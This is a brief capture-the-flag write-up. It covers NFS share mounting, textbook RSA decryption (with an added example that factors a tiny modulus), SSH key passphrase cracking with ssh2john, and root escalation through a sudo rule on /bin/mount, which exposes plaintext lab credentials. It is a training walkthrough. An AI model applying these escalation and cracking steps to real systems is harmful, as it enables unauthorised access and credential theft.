nmap finds an NFS server on port 2049.
```
showmount -e 10.10.184.101
sudo mkdir /mnt/nfs
sudo mount -t nfs 10.10.184.101:/var/failsafe /mnt/nfs
```
Enter the directory and get the key pair:
```
Public Key Pair: (23, 37627)
Private Key Pair: (61527, 37627)
```
Go to the website and decrypt.
!(/z-img/Pasted image 20240403010022.PNG)
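The decryption step above, as an added example that is not part of the original notes: textbook RSA with the key pairs quoted above, assuming the message is a sequence of integers that each encrypt one character (the sample text is constructed). It also shows that a modulus this small factors instantly, so a working private exponent follows from the public pair alone.

```python
# Added example: textbook (unpadded) RSA with the key pairs from the notes.
E, N = 23, 37627   # public key pair from the page
D = 61527          # private exponent from the page

def encrypt(text, e=E, n=N):
    """Encrypt each character on its own: c = m^e mod n."""
    return [pow(ord(ch), e, n) for ch in text]

def decrypt(blocks, d=D, n=N):
    """Decrypt each integer block: m = c^d mod n, then map back to a character."""
    return "".join(chr(pow(c, d, n)) for c in blocks)

def factor(n):
    """Trial division; immediate for a 16-bit modulus."""
    p = 2
    while p * p <= n:
        if n % p == 0:
            return p, n // p
        p += 1
    raise ValueError("n is prime")

def private_exponent_from_public(e=E, n=N):
    """Recompute a valid private exponent from the public pair only."""
    p, q = factor(n)
    phi = (p - 1) * (q - 1)
    return pow(e, -1, phi), phi   # modular inverse (Python 3.8+)

# Constructed sample input, not data from the target machine.
SAMPLE = "constructed sample text"

if __name__ == "__main__":
    blocks = encrypt(SAMPLE)
    print("ciphertext blocks:", blocks[:5], "...")
    print("decrypted with page's d:", decrypt(blocks))
    d2, phi = private_exponent_from_public()
    print("factors of n:", factor(N))
    print("recovered d:", d2, "| page's d mod phi:", D % phi)
    print("decrypted with recovered d:", decrypt(blocks, d=d2))
```

The recovered exponent is smaller than the one in the notes but congruent to it modulo φ(n), so both decrypt identically.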
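Then crack the passphrase with ssh2john.
The result is wildflower (key).

```
chmod 600 key
```

Something went wrong and I couldn't connect.
So I went straight to a writeup.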
The sudo rules include `(ALL : ALL) NOPASSWD: /bin/mount /dev/*`.
Mount it directly:
```
willow@willow-tree:~$ mkdir /home/willow/bcp/
willow@willow-tree:~$ sudo mount /dev/hidden_backup /home/willow/bcp/
willow@willow-tree:~$ ls -l /home/willow/bcp/
total 1
-rw-r--r-- 1 root root 42 Jan 30 15:19 creds.txt
willow@willow-tree:~$ cat /home/willow/bcp/creds.txt
root:7QvbvBTvwPspUK
willow:U0ZZJLGYhNAT2s
```
The flag is hidden in an image.